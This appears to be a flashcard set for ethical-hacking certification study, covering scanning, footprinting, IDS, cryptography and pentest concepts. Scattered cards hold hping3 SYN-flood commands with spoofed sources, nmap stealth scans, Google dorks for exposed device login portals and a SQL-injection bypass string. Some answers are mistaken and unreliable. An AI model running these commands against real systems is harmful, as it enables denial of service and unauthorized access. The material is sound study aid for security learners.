Vulnerability research should include looking for the latest exploit news, any zero-day outbreaks in viruses and malware, and what recommendations are being made to deal with them. What are some tools to help with this?

DNS Tools UltraTools Mobile Whois Lookup Tool

WHOIS Lookup Tools for Mobile

A backdoor

What is a covert channel?

Ability to filter for packet fragments

What is the main improvement of ipchains over ipfwadm?

Insider affiliate

What threat type is someone with limited authorized access?

operating system level application level network level

What three levels can attackers gain access to?

Tails

What tool aims at preserving privacy and anonymity and helps you to: Use the Internet anonymously and circumvent censorship Leave no trace on the computer Use state-of-the-art cryptographic tools to encrypt files, emails and instant messaging

CurrPorts

What tool displays a list of all currently opened TCP/IP and UDP ports on your local computer, including information about the process that opened the port, the process name, full path, version information, the time it created, and the user who created it.

StegoStick

What tool hides any file or message into an image (BMP, JPG, GIF), Audo/Video (MPG, WAV, etc) or any other file format (PDF, EXE, CHM, etc)

McAfee's Visual Trace NeoTrace Trout VisualRoute Magic NetTrace Network Pinger GEO Spider Ping Plotter

What tools can you use to build a comprehensive map of a network showing geographic locations and such?

A host-based IDS

What type of IDS can recognize an attack made with the use of fragroute?

Nbtstat

Which command can be used to view NetBIOS information?

netsh firewall set opmode enable

Which command enables the Windows firewall?

A)Security awareness training

Which of the following is NOT a component of risk assessment? A)Security awareness training B)Physical safeguards C)Administrative safeguards D)Logical safeguards

C)Host-based IDS on the exposed system

Which of the following is a possible mitigation to the use of fragroute by an attacker? A)SPAN B)RSPAN C)Host-based IDS on the exposed system D)Expression matching

END

Which of the following is not a flag on a packet?

D. Teardrop

Which of the following takes advantage of weaknesses in fragment reassembly in TCP/IP? A. Stuxnet B. Smurf C. SYN Flood D. Teardrop

NULL

Which of the following types of attack has no flags set?

22

Which port number is used for SSH?

Malware covers all malicious software

Which statement(s) define malware most accurately?

D) Scanning

Which step comes right after footprinting? A) Privilege escalation B) Gaining access C) System attacks D) Scanning

(XMAS) No response RST/ACK

XMAS scans, if the port is open _____, if the port is closed ____ responses.

Microsoft Windows

Xmas scan will not work against any current version of ___

D) Ping Sweep

You are attempting to identify live targets on a particular subnet. You kick off a scan whereby ICMP packets are sent to every IP address within the subnet and await responses. What is this activity called? A) Enumeration B) Ping Crawl C) Port Scan D) Ping Sweep

telephone calls to the help desk or technical department

example of Active Reconnaissance

searching public records or news releases

example of Passive Reconnaissance

performs an ICMP ping

hping3 -1 172.17.15.12

performs a UDP scan on port 80

hping3 -2 192.168.12.55 -p 80

scans ports 20 through 100

hping3 -8 20-100

looks for HTTP signature packets on eth0

hping3 -9 HTTP -I eth0

SYN flood from 192.168.10.10 against 192.168.10.22

hping3 -S 192.168.10.10 -a 192.168.10.22 -p 22 --flood

Pages containing D-Link login portals

intitle:"D-Link VoIP Router" "Welcome"

Pages containing login portals

intitle:"Login Page" intext:"Phone Adapter Configuration Utility"

Search Linksys phones

intitle:"SPA Configuration"

Finds the Asterisk web management portal

intitle:asterisk.management.portal web-access

Look for the Asterisk management portal

intitle:asterisk.management.portal web-accesss

Find the Cisco phone details

inurl:"NetworkConfiguration" cisco

Find Cisco call manager

inurl:"ccmuser/login.asp"

Competitive intelligence

is non-interfering and subtle in nature

PsKill

kill processes by name or process ID

Internet Assigned Numbers Authority (IANA)

maintains something called the Service Name and Transport Protocol Port Number Registry, which is the official list for all port number reservations.

SYN port scan on a target as quietly as possible

nmap 192.168.1.0/24 -sS -T0

An aggressive XMAS scan

nmap 192.168.1.0/24 -sX -T4

Scan multiple IPs

nmap 192.168.1.100 192.168.1.101

nmap <scan options> <target>

nmap syntax

Dynamic ports

port numbers 49,152 - 65,535

is nothing more than a system you set up to act as an intermediary between you and your targets.

proxy

PsShutdown

shuts down and optionally reboots a computer

active footprinting

social engineering, human interaction, and anything that requires the hacker to interact with the organization is considered what type of footprinting?

IP address decoy

technique refers to generating or manually specifying IP addresses of the decoys in order to evade IDS/firewall

E-mail Policy or E-mail Security Policy

this addresses the proper use of the company e-mail system.

Full Connect (also called TCP connect or full open scan)

this runs through a full connection (three-way handshake) on all ports, tearing it down with an RST at the end.

ICMP ECHO packets (UDP datagrams in Linux versions)

traceroute or tracert uses what to report information on each "hop" (router) from the source to the destination?

Cracker malicious hacker

uses those skills, tools, and techniques either for personal gain or destructive purposes or, in purely technical terms, to achieve a goal outside the interest of the system owner.

confidentiality integrity availability

what is the trinity of IT security? (3 parts)

CCleaner

what tool cleans traces of temporary files, log files, registry files, memory dumps, and also your online activities such as your Internet history

Anonymous footprinting

where you try to obscure the source of all this information gathering

Normal output

-oN

B) Xterm

Of the commands listed, which are most likely to NOT be Trojaned by an attacker? A) Netstat B) Xterm C) Ps D) Top

B) MBSA

Of the following, which is best for checking patch levels on a Windows machine? A) Nslookup B) MBSA C) Matasploit D) Sigverif

C)Hot and cold aisles

Of the listed physical security controls, which is usually only deployed in the data center? A)Fire suppression B)CCTV cameras C)Hot and cold aisles D)Security guards

NetScan Tools Pro SuperScan Network Inventory Explorer PRTG Network Monitor Global Network Inventory Net Tools SoftPerfect Network Scanner IP-Tools Advanced Port Scanner MegaPing CurrPorts

Scanning Tools

NetScanTools Pro SuperScan PRTG Network Monitor OmniPeek MiTeC Network Scanner NEWT Professional MegaPing

Scanning Tools

Umit Network Scanner Fing IP Network Scanner PortDroid Network Analysis Pamn IP Scanner Network Discovery

Scanning Tools for Mobile

Bit

What PDU is at Layer 1 of OSI model

Training

What is the best option for thwarting social engineering attacks?

True positive

What is the term for a system correctly allowing traffic or actions that should be allowed?

True negative

What is the term for a system correctly preventing traffic or actions that should be not allowed?

False negative

What is the term for a system failing to prevent traffic or actions that should be not allowed?

Denial of service

What type of cybersecurity attack is mitigated by redundancy?

Cookie hijacking

Which attack can be used to take over a previous session?

B)CA

Which component in the PKI issues the certificate? A)CPS B)CA C)RA D)VA

C)OSSTMM

Which of the following testing methodologies addresses security controls? A)SOAP B)CORBA C)OSSTMM D)OWASP

B)Distributed denial of service E)Password cracking

You are running a penetration test for a small IT service provider during normal operating hours. Which of the following activities is most likely to be restricted in the rules of engagement (ROE)? (Choose all that apply.) A)Social engineering B)Distributed denial of service C)Network sniffing D)Port scanning E)Password cracking

C. CNAME

You have an FTP service and an HTTP site on a single server. Which DNS record allows you to alias both services to the same record (IP address)? A. NS B. SOA C. CNAME D. PTR

A)It is very easy to detect on the computer or device being scanned.

You have decided to use Nmap to scan your network to aid in determining any network security issues that exist. The first type of scan that you decide to run is the TCP connect scan. Which statement is true regarding this type of scan? A)It is very easy to detect on the computer or device being scanned. B)It sends a packet with only the FIN flag set in the TCP header. C)It sends a packet with no flags switched on in the TCP header. D)It can detect three port states: open, closed, and filtered.

A)Deploy a switch, and implement a VLAN for the Research department devices and computers.

You need to isolate the communication for desktop computers in the Research department within the company's network. The solution must improve overall performance and security. Which solution should you suggest? A)Deploy a switch, and implement a VLAN for the Research department devices and computers. B)Deploy Bluetooth, and implement a PAN for the Research department devices and computers. C)Deploy 802.11b, and implement a WLAN for the Research department devices and computers. D)Deploy 802.11g, and implement a WLAN for the Research department devices and computers.

Subnet Mask Calculators

Attackers calculate subnet masks using ____ to identify the number of hosts present in the subnet

Backdoors RootKits Trojans

Attackers may prevent the system from being owned by other attackers by securing their exclusive access with ____, ____, or ____.

UPnP SSDP M-SEARCH

Attackers may use ___ information discovery tool to check if the machine is vulnerable to uPnP exploits or not

network traffic recorded logs received from

Attackers need to harvest IPv6 addresses from ____ : and other header lines in archived email or Usenet news messages

identify vulnerabilities

Footprinting allows attacker to ___ in the target systems in order to select appropriate exploits

same

For a block cipher algorithm, the length of the input block is the ___ as the length of the output block.

Session

Layer 5 of OSI model

FF:FF:FF:FF:FF:FF

MAC address of broadcast messages

fingerprinting

Port sweeping and enumeration on a machine is also known as ____.

Regional Internet Registry (RIR)

You can find the range of IP addresses and the subnet mask used by the target organization from ______

Nmap SolarWinds Netcraft HTTrack

You can fingerprint operating systems with several tools:

Network Topology Mapper

discovers a network and produces a comprehensive network diagram

Metagoofil

extracts metadata of public documents (pdf, doc, xls, ppt, docx, pptx, xlsx, etc.) belonging to a target company

Control Objects for Information and Related Technology (COBIT)

is "an IT governance framework and supporting toolset that allows managers to bridge the gap between control requirements, technical issues and business risks. It enables clear policy development, good practice, and emphasizes regulatory compliance."

Maltego (www.paterva.com/web5/)

is "an open source intelligence and forensics application" designed explicitly to demonstrate social engineering (and other) weaknesses for your environment.

Exploit Database

is a Common Vulnerabilities and Exposures (CVE) compliant archive of public exploits and corresponding vulnerable softwate

resource identifier (RID)

is a portion of the overall SID identifying a specific user, computer, or domain.

Online Reputation Management (ORM)

is a process of monitoring a company's reputation on Internet and taking certain measures to minimize the negative search results/reviews and thereby improve its brand reputation.

Maltego

is a program that can be used to determine the relationships and real world links between people, groups of people (social networks), companies, organizations, websites, Internet infrastructure, phrases, documents, and files

Proxy Workbench

is a proxy server that displays data passing through it in real time, allows you to drill into particular TCP/IP connections, view their history, save the data to a file, and view the socket connection diagram

Payment Card Industry Data Security Standard (PCI-DSS)

is a security standard for organizations handling credit cards, ATM cards, and other point-of-sales cards.

Bot

is a software application that can be controlled remotely to execute or automate predefined tasks

Payload

is the part of an exploit code that performs the intended malicious action, such as destroying, creating backdoors, and hijacking computer

Document steganography

is the technique of hiding secret messages transferred in the form of documents It includes addition of white spaces and tabs at the end of the lines

Nessus

is the vulnerability and configuration assessment product

Eavesdropping

is unauthorized listening of conversations or reading of messages

Ping Sweep

is used to determine the live hosts from a range of IP addresses by sending ICMP ECHO requests to multiple hosts. If a host is live, it will return an ICMP ECHO reply

ID Serve

is used to identify the make, model, and version of any web site's server software, it also used to identify non-HTTP (non-web) Internet servers such as FTP, SMTP, POP, NEWS, etc.

Network scanning

refers to a set of procedures for identifying hosts, ports, and services in a network

Source routing

refers to sending a packet to the intended destination with partially or completely specified route (without firewall / IDS-configured routers) in order to evade IDS/firewall

Competitive intelligence

refers to the information gathered by a business entity about its competitors' customers, products, and marketing

802.11a

runs at up to 54 Mbps at 5 GHz

PsFile

shows files opened remotely

Bastion host

A computer placed outside a firewall to provide public services to other Internet sites and hardened to resist external attacks.

C. The results will display all HTTP traffic from 192.168.1.1

Examine the Wireshark filter shown here: ip.src == 192.168.1.1 &&tcp.srcport == 80 Which of the following correctly describes the capture filter? A. The results will display all traffic from 192.168.1.1 destined for port 80. B. The results will display all HTTP traffic to 192.168.1.1 C. The results will display all HTTP traffic from 192.168.1.1. D. No results will display because of invalid syntax.

Software in use and its behavior Scripting platform used

Examining cookies may provide what kind of information?

"initrd"

Horse Pill is Linux kernel rootkit that resides inside the ___ using which it infects the system and deceives the system owner with the use of container primitives

Application

Layer 7 of OSI model

TCP payload

Reverse ICMP Tunnels the Victim's system is triggered to encapsulate ___ in an ICMP echo packet which is forwarded to the proxy server

C) IDS, packer logger, and sniffer

Snort can perform as a ____? A) IDS, sniffer, and proxy B) IDS, firewall, and sniffer C) IDS, packer logger, and sniffer D) IDS, sniffer, and forensic packet analyzer

Network

The TCP/IP model Internet layer is what in the OSI model layer?

B)No known workaround exists

The security team has been analyzing several vulnerabilities found in the Linux kernel they are using. Any upgrades that can be delayed must be pushed to the next fiscal year. Which of the following describes a vulnerability that would require an immediate kernel upgrade? A)A threat vector can be disabled B)No known workaround exists C)Exists in an unused function D)Known workarounds exist

NS (Name Server)

This record defines the name servers within your namespace. These servers are the ones that respond to your clients' requests for name resolution.

SOA (Start of Authority)

This record identifies the primary name server for the zone. The SOA record contains the hostname of the server responsible for all DNS records within the namespace, as well as the basic properties of the domain.

A (Address)

This record maps an IP address to a hostname and is used most often for DNS lookups.

CNAME (Canonical Name)

This record provides for domain name aliases within your zone.

www.geektools.com www.dnsstuff.com www.samspade.com

Well-known websites for DNS or whois footprinting:

Internet Zone Internet DMZ Production Network Zone Intranet Zone Management Network Zone

What are five examples of Network Security Zones?

eMailTrackerPro PoliteMail Email Lookup-Free Email Tracker Yesware Zendio ContactMonkey Pointofmail Read Notify WhoReadMe DidTheyReadit GetNotify Trace Email G-Lock Analytics

What are some Email Tracking Tools?

[cache:] [link:] [related:] [info:] [site:] [allintitle:] [intitle:] [allinurl:] [inurl:]

What are some Google advance search operators?

Know Security Posture Reduce Focus Area Identify Vulnerabilities Draw Network Map

What are the four main goals of footprinting?

Promiscuous Policy Permissive Policy Prudent Policy Paranoid Policy

What are the four types of Security Policies?

1) Helps in monitoring and detecting network behaviors 2) Detect and recover from security breeches 3) Pays attention to various threats 4) Benefits organization in cost prosoective 5) Identify assets 6) Helps to perform risk assessment

What are the six goals of EISA?

Something you know Something you have Something you are

What are the three factors of authentication?

C) An attacker who does not care about the consequences of his actions to himself

What is the best description of a suicide hacker? A) An attacker who perform only DoS attacks B) An attacker who posts all his findings for public review C) An attacker who does not care about the consequences of his actions to himself D) An attacker who does not care about the consequences of his actions to others

C) To sniff or analyze traffic

What is the purpose in configuring a span port on a switch? A) To allow multiple devices to connect to one port B) To protect against MAC spoofing C) To sniff or analyze traffic D) To restrict the port to one device connection only

It evaluates the execution of the security plan. It is also called a lessons learned session.

What is the purpose of a post-mortem in a security audit?

To document what was done and to provide a record for review if problems arise

What is the purpose of recording the steps taken when implementing a new system?

Password recovery tool for Windows

What is the purpose of the Cain and Abel tool?

To crack weak passwords

What is the purpose of the John the Ripper tool?

Vulnerability scanning

What is the purpose of the Nessus tool?

Intrusion detection

What is the purpose of the Snort tool?

To check the integrity of system files

What is the purpose of the Tripwire tool?

D)Demonstrates common server-side security flaws

What is the purpose of the WebGoat application? A)Responds to SYN flood attacks B)Probes your network for security issues C)Acts as a honeypot for in the network DMZ D)Demonstrates common server-side security flaws

Port scanning

What is the purpose of the nmap tool?

This Web site is an Internet archiving site that maintains archives of Web sites over many years

What is the purpose of the web site archive.org?

define the scope of the assessment

What is the second step in Pen Testing?

Threat vector

What is the term for the tool or process used to exploit a threat?

Spoofcard (www.spoofcard.com)

What tool can be used to spoof a phone number?

frame

When a recipient system gets a ___, it checks the physical address to see who the message is intended for.

D. Hactivism

When an attack by a hacker is politically motivated, the hacker is said to be participating in which of the following? A. Black-hat hacking B. Gray-box attacks C. Gray-hat attacks D. Hactivism

2013090800 = serial number 86400 = refresh interval 900 = retry time 1209600 = expiry time 3600 = defines the TTL for the zone

When looking at a zone transfer you see this line below: hostmaster.anycomp.com (2013090800 86400 900 1209600 3600) What do the numbers mean?

D)ROE

Which documentation provides an ethical hacker with the scope of targets and allowed testing techniques and tools? A)NDA B)PCI C)LPT D)ROE

RSA

Which encryption algorithm is susceptible to a factorization attack?

Port security

Which feature can be enabled on a switch to prevent MAC flooding and MAC spoofing?

snort.config

Which file contains the options for the configuration of the Snort tool?

A. RST

Which flag forces a termination of communications in both directions? A. RST B. FIN C. ACK D. PSH

A. whois

Which footprinting tool or technique can be used to find the names and addresses of employees or technical points of contact? A. whois B. nslookup C. dig D. traceroute

A)MAC flooding D)MAC spoofing

Which of the following attacks can be mitigated by using port security on a switch? (Choose all that apply.) A)MAC flooding B)IP spoofing C)DNS poisoning D)MAC spoofing

C) %windir%\system32\drivers\ect\services

Which of the following contains a listing of port numbers for well-known services defines by IANA? A) %windir%\ext\lists B) %windir%\system32\drivers\ect\Imhosts C) %windir%\system32\drivers\ect\services D) %windir%\system32\drivers\ect\hosts

B)Classes

Which of the following is NOT a component of the Metasploit architecture? A)Interfaces B)Classes C)Libraries D)Modules

A)RC4

Which of the following is NOT a type of block cipher? A)RC4 B)DES C)RC5 D)IDEA

A. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for reporting computer security incidents worldwide.

Which of the following is a primary service of the U.S. Computer Security Incident Response Team (CSIRT)? A. CSIRT provides an incident response service to enable a reliable and trusted single point of contact for reporting computer security incidents worldwide. B. CSIRT provides a computer security surveillance service to supply a government with important intelligence information on individuals traveling abroad. C. CSIRT provides a penetration testing service to support exception reporting on incidents worldwide by individuals and multinational corporations. D. CSIRT provides a vulnerability assessment service to assist law enforcement agencies with profiling an individual's property or company's asset.

C)MAC filtering

Which of the following is an access control mechanism that can be implemented on all wireless networks? A)WEP encryption B)WPA/WPA2 encryption C)MAC filtering D)SSID broadcast

PHP

Which of the following is an example of a server-side scripting language?

A. Incident management

Which of the following is best defined as a set of processes used to identify, analyze, prioritize, and resolve security incidents? A. Incident management B. Vulnerability management C. Change management D. Patch management

Netcat

Which of the following is capable of port redirection? Netstat TCPView Netcat Loki

A) SSL works at the Transport layer, and S-HTTP operates at the Application layer.

Which of the following is true regarding SSL and S-HTTP? A) SSL works at the Transport layer, and S-HTTP operates at the Application layer. B) SSL works at the Network layer, and S-HTTP operates at the Application layer. C) SSL works at the Application layer, and S-HTTP operates at the Network layer. D) SSL works at the Application layer, and S-HTTP operates at the Transport layer.

B. It is a passive OS fingerprinting tool.

Which of the following is true regarding the p0f tool? A. It is an active OS fingerprinting tool. B. It is a passive OS fingerprinting tool. C. It is designed to extract metadata for Microsoft files. D. It is designed for remote access.

D) Running the command sid2user S A 5 21 861567501 1383384898 839522115 500 will return the name of the true administrator account

Which of the following is true regarding this output? A) Running the command sid2user S A 5 21 861567501 1383384898 839522115 502 will return the name of the true administrator account B) Running the command sid2user S A 5 21 861567500 1383384898 839522115 501 will return the name of the true administrator account C) Running the command sid2user S A 5 21 861567501 1383384898 839522115 500 501 will return the name of the true administrator account D) Running the command sid2user S A 5 21 861567501 1383384898 839522115 500 will return the name of the true administrator account

ACL

Which of the following is used to set permissions on content in a website?

B) SYN/ACK

Which of the following represents the second step in the TCP three way handshake? A) SYN B) SYN/ACK C) ACK D) ACK/SYN

A)Execute, implant, retract

Which step involves removing additional user accounts created for the attack phase of a penetration test? A)Execute, implant, retract B)Acquire target C)Escalate privileges D)Penetrate perimeter

IPsec

Which technology can provide protection against session hijacking?

Trapdoor

Which term is used to describe the difficulty of factoring a value generated by large key size?

A)Vulnerability scanner

Which tool can help identify out-of-date software versions, missing patches, or system upgrades? A)Vulnerability scanner B)Network sniffer C)Penetration test D)IDS

Vulnerability scanning

Which type of scanning operates proactively to locate issues, utilizes automated processes, and scans and identifies vulnerabilities of all systems present on the network?

TCPView

Which utility will tell you in real time which ports are listening or in another state?

Remote SPAN (RSPAN)

Which version of the SPAN switch configuration sends traffic from multiple ports on multiple switches to a single switch port where the IDS is located?

whois.com

Which web site can be used to determine the owner of a target web site?

B. Operating system

While performing a pen test, you find success in exploiting a machine. Your attack vector took advantage of a common mistake--the Windows 7 installer script used to load the machine left the administrative account with a default password. Which attack did you successfully execute? A. Application level B. Operating system C. Shrink wrap D. Social engineering E. Misconfiguration

C)Hope to be caught

Why is someone called a suicide hacker? A)Hack for a social cause B)Hack and then offer to correct the vulnerability for money C)Hope to be caught D)Hack with permission

To prevent information leakage

Why should you reduce the amount of information provided in error messages?

Promiscuous mode

Wireshark requires a network card to be able to enter which mode to sniff all network traffic?

B)Time-frame analysis

You are responding to an active hacking attack and need to verify whether an insider suspect is involved. Which type of data analysis should you use? A)Data-hiding analysis B)Time-frame analysis C)Application analysis D)File analysis

C)Child pornography

You have been hired to perform a security assessment of the corporate network. Which discovery requires you to contact external authorities immediately? A)Unlicensed software B)Email exchange between a married employees C)Child pornography D)Espionage data acquired from another organization

D)SMB

You have been using a network sniffer to monitor the traffic on your network. You examine the results and notice that some devices are communicating over TCP port 445. Which protocol is most likely causing this traffic? A)SSL B)BGP C)NetBIOS D)SMB

A)Deploy a secure remote access solution for employees to connect to the company's internal network

You have decided to implement IPSec for certain types of traffic. Which of the following is the best description of why you would implement this protocol? A)Deploy a secure remote access solution for employees to connect to the company's internal network B)Ensure that the same IP address is always used by a server C)Authenticate both ends of a connection between a client and server D)Establish an encrypted link between a web server and a browser

B)IP spoofing

You perform a ping and receive the following results: Pinging 192.168.10.1 with 32 bytes of data: Reply from 192.168.10.1: bytes=32 time=5ms TTL=60 Reply from 192.168.10.1: bytes=32 time=1ms TTL=60 Reply from 192.168.10.1: bytes=32 time=1ms TTL=60 Reply from 192.168.10.1: bytes=32 time=1ms TTL=60 During a routine ping test later in the week, you receive a reply packet from the IP address 192.168.10.1, but the TTL value is now 40. What is the most likely reason for this discrepancy? A)DDoS attack B)IP spoofing C)ICMP filtering D)Routing loop

C. Installing WinPcap

You want to begin sniffing, and you have a Windows 7 laptop. You download and install Wireshark but quickly discover your NIC needs to be in "promiscuous mode." What allows you to put your NIC into promiscuous mode? A. Installing lmpcap B. Installing npcap C. Installing WinPcap D. Installing libPcap E. Manipulating the NIC properties through Control Panel | Network and Internet | Change Adapter Settings

B. Gray box

You've been hired as part of a pen test team. During the brief, you learn the client wants the pen test attack to simulate a normal user who finds ways to elevate privileges and create attacks. Which test type does the client want? A. White box B. Gray box C. Black box D. Hybrid

A. Fragmenting

You've decided to begin scanning against a target organization but want to keep your efforts as quiet as possible. Which IDS evasion technique splits the TCP header among multiple packets? A. Fragmenting B. IP spoofing C. Proxy scanning D. Anonymizer

B)Brute-force attack

Your company implemented both symmetric and asymmetric cryptography on its network. As a security professional, you must protect against all types of cryptography attacks. Which attack affects both types of cryptography that are implemented? A)Man-in-the-middle attack B)Brute-force attack C)Session hijacking D)Dictionary attack

routed protocol routing protocol

____ is one that is actually being packaged up and moved around. (IPv4 and IPv6). A _____ is the one that decides the best way to get to the destination (for example, BGP, OSPF, or RIP).

Proxy server

is an application that can serve as an intermediary for connecting with other computers

client

A computer process that requests a service from another computer and accepts the server's responses.

Data Link layer (Layer 2)

At which layer of the OSI model does an ARP poisoning attack occur?

RST

During an FIN scan, what indicates that a port is closed?

it pulls every record from the DNS server instead of just the one, or one type, you're looking for.

How does a zone transfer using ls -d differ from a normal DNS request?

It extracts (reverse engineers) data points from a graph

How does the tool DataThief operate?

ICMP Ping

Hping Commands: hping3 -1 10.0.0.25

-S

Hping sets the SYN flag

IP spoofing

In what attack does the attacker assume the IP address of a trusted device in an attempt to access protected resources?

Hping Scapy Komodia Ettercap Cain Nmap

What tools can spoof an IP address:

802.2

Which IEEE standard describes Ethernet?

Suicide hacker

Which kind of hacker hopes to be caught?

E. 631

You are examining traffic to see if there are any network-enabled printers on the subnet. Which of the following ports should you be monitoring for? A. 53 B. 88 C. 445 D. 514 E. 631

B)White box

You organization has contracted with a third party security firm to access your network by performing a penetration test. The test is designed to simulate a malicious insider who has complete knowledge of the target system. What type of test is this? A)Green box B)White box C)Gray box D)Black box

Direct TTL Probes

1) Send packet to host of suspect spoofed packet that triggers reply and compare TTL with suspect packet; if the TTL in the reply is not the same as the packet being checked, it is a spoofed packet 2) This technique is successful when attacker is in a different subnet from victim

covert channel

A communications channel that is being used for a purpose it was not intended for, usually to transfer information secretly.

Network (Layer 3)

At which layer of the OSI model does an IP spoofing attack occur?

Network (Layer 3)

At which layer of the OSI model does an attack using a rogue DHCP server occur?

Black hats

Considered the bad guys, these are the crackers, illegally using their skills for either personal gain or malicious intent. They seek to steal (copy) or destroy data and to deny access to resources and systems. Do not ask for permission or consent.

"fragment identification" number (IPID)

Every IP packet on the Internet has a ____

B. The zone copy is unchanged.

Examine the following SOA record: @ IN SOARTDNSRV1.somebiz.com postmaster.somebiz.com. ( 200408097 ; serial number 3600 ; refresh [1h] 600 ; retry [10m] 86400 ; expire [1d] 7200 ) ; min TTL [2h] If a secondary server in the enterprise is unable to check in for a zone update within an hour, what happens to the zone copy on the secondary? A. The zone copy is dumped. B. The zone copy is unchanged. C. The serial number of the zone copy is decremented. D. The serial number of the zone copy is incremented.

gain higher privileges

Exploiting software vulnerabilities allows attacker to execute a command or binary on a target machine to ___ than the existing or bypass security mechanisms

Audit

Independent review and examination of records and activities to assess the adequacy of system controls, to ensure compliance with established policies and operational procedures, and to recommend necessary changes.

State Sponsored Hackers

Individuals employed by the government to penetrate and gain top-secret information and to damage information systems of other governments

Advanced Persistent Threats

Is an attack that focus on stealing information from the victim machine without the user being aware of it

Pseudonymous footprinting

Make someone else take the blame for your information gathering

Attacks

Motive (Goal) + Method + Vulnerability =

Acceptable use policy (AUP)

Policy stating what users of a system can and cannot do with the organization's assets

UID (User ID) GID (Group ID)

Similar to the SID and RID on a Microsoft Windows machine but on the Linux.

1) The client sends a single SYN packet to the server on the appropriate port 2) If the port is open then the server responds with a SYN/ACK packet 3) If the server responds with an RST packet, then the remote port is in the "closed" state 4) The client sends the RST packet to close the initiation before a connection can ever be established

Stealth Scan Process

Operating system (OS) attacks Application-level attacks Shrink-wrap code attacks Misconfiguration attacks

The 4 Attack Types

decryption

The process of transforming cipher text into plain text through the use of a cryptographic algorithm.

A)Evil twin

To attack a wireless network, an attacker sets up a wireless access point that is configured to look exactly like a company's valid wireless access point by using the same SSID. What kind of attack is this? A)Evil twin B)War chalking C)Rogue access point D)WEP attack

Microsoft Outlook www.emailtrackerpro.com www.mailtracking.com

Tools for email footprinting:

Active Passive

What are the two types of banner grabbing?

Risk avoidance

What happens when an organization decides to cease an activity or process that creates a risk?

Scanning

What phase comes after footprinting?

Single-factor authentication

What type of authentication is being performed when both a username and a password are required?

B)RC4

What type of encryption does the Syskey utility utilize? A)RC6 B)RC4 C)RC5 D)RC2

B)Tripwire

Which of the following tools is a System Integrity Verifier? A)Nessus B)Tripwire C)ZoneAlarm D)Snort

Remote Procedure Call (RPC)

allows client and server to communicate in distributed client/server programs

Procedures

are detailed step-by-step instructions for accomplishing a task or goal.

Guidelines

are flexible recommended actions users are to take in the event there is no standard to follow.

Standards

are mandatory rules used to achieve consistency.

Network Tools Pro

assists in troubleshooting, diagnosing, monitoring, and discovering devices on the network

Access control

basically means restricting access to a resource in some selective manner.

Drawing Network Diagrams

gives valuable information about the network and its architecture to an attacker

IP geolocation

helps to identify information such as country, region/state, city, ZIP/postal code, time zone, connection speed, ISP (hosting company), domain name, IDD country code, area code, mobile carrier, elevation, etc.

Finds the Linksys VoIP router configuration page

inurl:/voice/advanced/ intitle:Linksys SPA configuration

Sniffing (also called wiretapping)

is the art of capturing packets as they pass on a wire, or over the airwaves, to review for interesting information.

IPsec

uses ESP (Encapsulation Security Payload), AH (Authentication Header) and IKE (Internet Key Exchange) to secure communication between virtual private network (VPN) end points

Active reconnaissance

uses tools and techniques that may or may not be discovered but put your activities as a hacker at more risk of discovery.

Nondisclosure agreement (NDA)

what type of agreement will ensure the hacker will not disclose any information found during the test.

Passive Banner Grabbing

-Banner grabbing from error messages -Sniffing the network traffic -Banner grabbing from page extensions

C)Three-tier

-Each layer must be able to exist on a physically independent system -Each layer should exchange information only with the layers above and below it -There is a presentation layer, a logic layer, and a data layer Which system architecture has the above characteristics? A)Sandboxing B)Three-legged C)Three-tier D)Defense in depth

SYN ping

-PS

TCP ping

-PT

Serial, normal speed scan

-T2

A. Use HTTP tunneling.

A security administrator is attempting to "lock down" her network and blocks access from internal to external on all external firewall ports except for TCP 80 and TCP 443. (FTP, as well as some nonstandard port numbers). Which of the following is the most likely choice the user could attempt to communicate with the remote systems over the protocol of her choice? A. Use HTTP tunneling. B. Send all traffic over UDP instead of TCP. C. Crack the firewall and open the ports required for communication. D. MAC flood the switch connected to the firewall.

Protection profile (PP)

A set of security requirements specifically for the type of product being tested

crypter

A software tool that uses a combination of encryption and code manipulation to render malware undetectable to AV and other security-monitoring products.

check the filtering system

ACK flag probe scanning can also be used to ___ of target

records all keystrokes typed, IM chats, websites visited

Amac Keylogger for Mac invisibly ___, and takes screenshots and also sends all reports to the attacker by email, or upload everything to attacker's website

D. Archive.org

Amanda works as senior security analyst and overhears a colleague discussing confidential corporate information being posted on an external website. When questioned on it, he claims about a month ago he tried random URLs on the company's website and found confidential information. Amanda visits the same URLs but finds nothing. Where can Amanda go to see past versions and pages of a website? A. Search.com B. Google cache C. Pasthash.com D. Archive.org

Anonymizers

An _____ removes all the identifying information from the user's computer while the user surfs the Internet

B. The web application returned the first record it found

An administrator enters admin' or '1'='1 in the email field of a web page. A message appears stating "Your login information has been mailed to [email protected]" What is most likely occurred? A. The web application picked a record at random B. The web application returned the first record it found C. A server error has caused the application to malfunction D. The web application emailed the administrator about the error

C)14-character passwords will take only slightly longer to crack than the 8-character passwords

Due to the need to support legacy systems, you have been forced to rely on LAN Manager password security. To ensure that users' passwords are strong enough, you plan to use John the Ripper to crack the passwords after obtaining the SAM files from the domain controllers. One of the domains requires 14 characters in the password, while another domain requires only 8. Which of the following statements is true? A)14-character passwords will take much longer to crack than the 8-character passwords B)14-character and 8-character passwords will take exactly the same amount of time to crack C)14-character passwords will take only slightly longer to crack than the 8-character passwords D)8-character passwords will take longer to crack than the 14-character passwords

1) Restrict the interactive logon privileges 2) Use encryption technique to protect sensitive data 3) Run users and applications on the least privileges 4) Reduce the amount of code that runs with particular privilege 5) Implement multi-factor authentication and authorization 6) Perform debugging using bounds checkers and stress tests 7) Run services as unprivileged accounts 8) Test operating system and application coding errors and bugs thoroughly 9) Implement a privilege separation methodology to limit the scope of programming errors and bugs 10) Patch and update the kernel regularly 11) Change User Account Control settings to "Always Notify" 12) Restrict users from writing files to the search paths for applications 13) Continuously monitor file system permissions using auditing tools 14) Reduce the privileges of users and groups so that only legitimate administrators can make service changes 15) Use whitelisting tools to identify and block malicious software 16) Use fully qualified paths in all the Windows applications 17) Ensure that all executables are placed in write-protected directories 18) In Mac operating systems, make plist files read-only 19) Block unwanted system utilities or software that may be used to schedule tasks 20) Patch and update the web servers regularly

How to defend against privilege escalation

SYN scan on port 50-60

Hping Commands: hping3 -8 50-60 -S 10.0.0.25 -V

Intercept all traffic containing HTTP signature

Hping Commands: hping3 -9 HTTP -I eth0

ACK scan on port 80

Hping Commands: hping3 -A 10.0.0.25 -p 80

FIN, PUSH and URG scan on port 80

Hping Commands: hping3 -F -P -U 10.0.0.25 -p 80

SYN flooding a victim

Hping Commands: hping3 -S 192.168.1.1 -a 192.168.1.254 -p 22 --flood

Firewalls and Times Stamps

Hping Commands: hping3 -s 72.14.207.99 -p 80 -- tcp-timestamp

